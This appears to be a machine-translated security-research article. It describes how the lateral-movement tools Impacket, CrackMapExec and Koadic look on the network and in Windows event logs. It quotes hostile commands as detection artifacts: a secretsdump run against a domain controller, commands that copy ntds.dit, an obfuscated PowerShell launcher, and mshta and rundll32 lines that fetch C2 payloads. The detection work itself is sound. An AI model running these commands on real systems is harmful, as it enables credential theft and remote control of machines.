The number of attacks in the corporate sector is growing every year: for example, than in 2016, and at the end of 2018 β than in the previous period. Including those where the main working tool is the Windows operating system. In 2017-2018, APT Dragonfly, APT28, carried out attacks on government and military organizations in Europe, North America and Saudi Arabia. And they used three tools for this - , ΠΈ . Their source code is open and available on GitHub.
It is worth noting that these tools are not used for initial penetration, but for the development of an attack within the infrastructure. Attackers use them at different stages of the attack following the perimeter penetration. This, by the way, is difficult to detect and often only with the help of technology or tools to . The tools provide a variety of functions, from transferring files to interacting with the registry and executing commands on a remote machine. We conducted a study of these tools to determine their network activity.
What we needed to do:
- Understand how hacking tools work. Find out what attackers need to exploit and what technologies they can use.
- Find what is not detected by information security tools in the first stages of an attack. The reconnaissance stage can be skipped, either because the attacker is an internal attacker, or because the attacker is exploiting a flaw in the infrastructure that was not previously known. It becomes possible to restore the entire chain of his actions, hence the desire to detect further movement arises.
- Eliminate false positives from intrusion detection tools. We must not forget that when certain actions are discovered on the basis of intelligence alone, frequent errors are possible. Usually in the infrastructure there are a sufficient number of ways, indistinguishable from legitimate at first glance, to obtain any information.
What do these tools give attackers? If it is an Impacket, then the attackers get a large library of modules that can be used at different stages of the attack following the perimeter penetration. Many tools use Impacket modules internally, such as Metasploit. It has dcomexec and wmiexec to run commands remotely, secretsdump to get memory accounts added from Impacket. As a result, the correct detection of the activity of such a library will ensure the detection of derivatives.
About CrackMapExec (or simply CME), the creators wrote βPowered by Impacketβ for a reason. In addition, CME has ready-made functionality for popular scenarios: this is Mimikatz for obtaining passwords or their hashes, and the introduction of Meterpreter or Empire agent for remote execution, and Bloodhound on board.
Our third tool of choice is Koadic. It is quite fresh, it was presented at the international hacker conference DEFCON 25 in 2017 and has a non-standard approach: it works through HTTP, Java Script and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The creators call it COM Command & Control, or C3.
IMPACKET
The functionality of Impacket is very wide, ranging from reconnaissance within AD and collecting data from internal MS SQL servers, ending with techniques for obtaining credentials: this is an SMB relay attack, and obtaining the ntds.dit file containing user password hashes from a domain controller. Impacket also executes commands remotely using four different methods: via WMI, a service to manage the Windows scheduler, DCOM and SMB, and for this it needs credentials.
secret dump
Let's take a look at secretsdump. This is a module that can target both user machines and domain controllers. With it, you can get copies of LSA, SAM, SECURITY, NTDS.dit memory areas, so it can be seen at different stages of the attack. The first step in the operation of the module is authentication via SMB, which requires either the user's password or its hash to automatically carry out the Pass the Hash attack. Next comes a request to open access to the Service Control Manager (SCM) and gain access to the registry using the winreg protocol, using which the attacker can find out the data of the branches of interest to him and get the results via SMB.
On fig. 1 we see exactly how, when using the winreg protocol, access is obtained by registry key with LSA. To do this, use the DCERPC command with opcode 15 - OpenKey.
Rice. 1. Opening a registry key using the winreg protocol
Further, when access by key is obtained, the values ββare saved by the SaveKey command with opcode 20. Impacket does this in a very specific way. It saves the values ββto a file whose name is a string of 8 random characters with .tmp appended. In addition, further unloading of this file occurs via SMB from the System32 directory (Fig. 2).
Rice. 2. Scheme for obtaining a registry key from a remote machine
It turns out that you can detect such activity on the network by querying certain branches of the registry using the winreg protocol, specific names, commands and their order.
Also, this module leaves traces in the Windows event log, thanks to which it is easily detected. For example, as a result of executing the command
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCin the Windows Server 2016 log we will see the following key sequence of events:
1. 4624 - Remote Logon.
2. 5145 - checking access rights to the winreg remote service.
3. 5145 - checking the access rights to a file in the System32 directory. The file has the random name mentioned above.
4. 4688 - creating a cmd.exe process that launches vssadmin:
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - creating a process with the command:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - creating a process with the command:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - creating a process with the command:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Like many post-exploitation tools, Impacket has modules for remote command execution. We will focus on smbexec, which gives you an interactive command shell on a remote machine. This module also requires authentication via SMB with either a password or its hash. On fig. 3 we see an example of the operation of such a tool, in this case it is the local administrator console.
Rice. 3. smbexec interactive console
The first step in smbexec after authentication is to open the SCM with the OpenSCManagerW(15) command. The query is notable: it has the MachineName field set to DUMMY.
Rice. 4. Request to open Service Control Manager
Next, the service is created using the CreateServiceW (12) command. In the case of smbexec, we can see the same command building logic every time. On fig. 5 green color indicates the unchangeable parameters of the command, yellow - what the attacker can change. It is easy to see that the name of the executable file, its directory and the output file can be changed, but the rest is much more difficult to change without violating the logic of the Impacket module.
Rice. 5. Request to create a service using Service Control Manager
Smbexec also leaves clear traces in the Windows event log. In the Windows Server 2016 log for an interactive command shell with the ipconfig command, we see the following key sequence of events:
1. 4697 - installing the service on the victim's machine:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - creation of the cmd.exe process with the arguments from point 1.
3. 5145 - checking the access rights to the __output file in the C$ directory.
4. 4697 - Installing the service on the victim's machine.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - creation of the cmd.exe process with the arguments from point 4.
6. 5145 - checking the access rights to the __output file in the C$ directory.
Impacket is the basis for developing attack tools. It supports almost all protocols in the Windows infrastructure and at the same time has its own characteristics. Here are specific winreg requests, and the use of the SCM API with the characteristic formation of commands, and the format of file names, and SMB share SYSTEM32.
CRACKMAPEXEC
The CME tool is designed primarily to automate those routine actions that an attacker has to perform in order to advance within the network. It allows you to work in conjunction with the notorious Empire agent and Meterpreter. To execute commands invisibly, CME can obfuscate them. Using Bloodhound (a separate reconnaissance tool), an attacker can automate the search for an active domain administrator session.
Bloodhound
Bloodhound as a standalone tool allows you to conduct advanced reconnaissance within the network. It collects data about users, machines, groups, sessions and comes as a PowerShell script or binary. LDAP or protocols based on SMB are used to collect information. The CME integration module allows you to download Bloodhound to the victim's machine, run it and receive the collected data after execution, thereby automating the actions in the system and making them less noticeable. The graphical shell of Bloodhound presents the collected data in the form of graphs, which allows you to find the shortest path from the attacker's machine to the domain administrator.
Rice. 6. Bloodhound Interface
To run on the victim's machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. The CME uses its NetrJobAdd(1) function to create jobs over the network. An example of what the CME module sends is shown in fig. 7: this is a call to the cmd.exe command and obfuscated code in the form of arguments in XML format.
Fig.7. Creating a task via CME
After the task has been submitted for execution, the victim's machine starts the Bloodhound itself, and this can be seen in the traffic. The module is characterized by LDAP queries for getting standard groups, a list of all machines and users in the domain, getting information about active user sessions through the SRVSVC NetSessEnum request.
Rice. 8. Getting a list of active sessions via SMB
In addition, starting Bloodhound on the victim's machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and process name Β«C:WindowsSystem32cmd.exeΒ». Notable in it are the command line arguments:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "enum_avproducts
The enum_avproducts module is very interesting from the point of view of functionality and implementation. WMI allows you to use the WQL query language to get data from various Windows objects, which is essentially what this CME module uses. It generates queries to the AntiSpywareProduct and AntiMirusProduct classes about the protection tools installed on the victim's machine. In order to get the required data, the module connects to the rootSecurityCenter2 namespace, then generates a WQL query and receives a response. On fig. 9 shows the content of such requests and responses. In our example, Windows Defender was found.
Rice. 9. Network activity of enum_avproducts module
Often auditing WMI (Trace WMI-Activity), in the events of which you can find useful information about WQL queries, can be turned off. But if it is enabled, then if the enum_avproducts script is run, an event with ID 11 will be stored. It will contain the name of the user who submitted the request, and the name in the rootSecurityCenter2 namespace.
Each of the CME modules had its own artifacts, whether it was specific WQL queries or the creation of a certain type of task in the task scheduler with obfuscation and Bloodhound-specific activity in LDAP and SMB.
KOADIC
A distinctive feature of Koadic is the use of built-in JavaScript and VBScript interpreters in Windows. In this sense, it follows the trend of living off the land - that is, it has no external dependencies and uses standard Windows tools. This is a tool for a full-fledged Command & Control (CnC), because after infection, an "implant" is installed on the machine, allowing it to be controlled. Such a machine, in Koadic terminology, is called a "zombie". If there are not enough privileges to fully work on the side of the victim, Koadic has the ability to raise them using User Account Control bypass (UAC bypass) techniques.
Rice. 10. Koadic command shell
The victim must initiate communication with the Command & Control server. To do this, she needs to access a pre-prepared URI and get the main Koadic body using one of the stagers. On fig. 11 shows an example for the stager mshta.
Rice. 11. Initialization of the session with the CnC server
By the WS variable of the response, it becomes clear that the execution occurs through WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE variables contain key information about the parameters of the current session. This is the first request-response pair in the HTTP connection to the CnC server. Subsequent requests are directly related to the functionality of the called modules (implants). All Koadic modules only work with an active CnC session.
Mimikatz
Just like CME works with Bloodhound, Koadic works with Mimikatz as a separate program and has several ways to run it. Below is a request-response pair for downloading a Mimikatz implant.
Rice. 12. Transfer Mimikatz to Koadic
You can see how the format of the URI in the request has changed. It has a value for the csrf variable, which is responsible for the selected module. Pay no attention to her name; we all know that CSRF is usually understood differently. The same main body of Koadic came in response, to which code related to Mimikatz was added. It is quite large, so let's look at the key points. Here is the base64-encoded Mimikatz library, the serialized .NET class that will inject it, and the arguments to run Mimikatz. The result of the execution is transmitted over the network in clear text.
Rice. 13. The result of running Mimikatz on a remote machine
Exec_cmd
Koadic also has modules that can execute commands remotely. Here we will see the same URI generation method and the familiar sid and csrf variables. In the case of the exec_cmd module, code is added to the body that is capable of executing shell commands. The following code is shown in the HTTP response of the CnC server.
Rice. 14. Implant code exec_cmd
The variable GAWTUUGCFI with the familiar WS attribute is required for code execution. With its help, the implant calls the shell, processing two code branches - shell.exec with the return of the output data stream and shell.run without returning.
Koadic is not a typical tool, but it has its own artifacts by which it can be found in legitimate traffic:
- special formation of HTTP requests,
- using the winHttpRequests API,
- creating a WScript.Shell object via ActiveXObject,
- big executable body.
The initial connection initiates the stager, so it becomes possible to detect its activity through Windows events. For mshta, this is event 4688, which indicates the creation of a process with the start attribute:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6During the execution of Koadic, other 4688 events can be seen with attributes that perfectly characterize it:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Conclusions
The living off the land trend is gaining popularity among cybercriminals. They use the built-in Windows tools and mechanisms for their needs. We see the popular tools Koadic, CrackMapExec and Impacket following this principle appearing more and more frequently in APT reports. The number of forks on GitHub for these tools is also growing, new ones appear (there are already about a thousand of them now). The trend is gaining popularity due to its simplicity: attackers do not need third-party tools, they are already on the machines of victims and help bypass security measures. We are focused on the study of network interaction: each tool described above leaves its traces in network traffic; their detailed study allowed us to teach our product to detect them, which ultimately helps to investigate the entire chain of cyber incidents involving them.
Authors:
- Anton Tyurin, Head of Expert Services Department, PT Expert Security Center, Positive Technologies
- Egor Podmokov, expert, PT Expert Security Center, Positive Technologies
Source: habr.com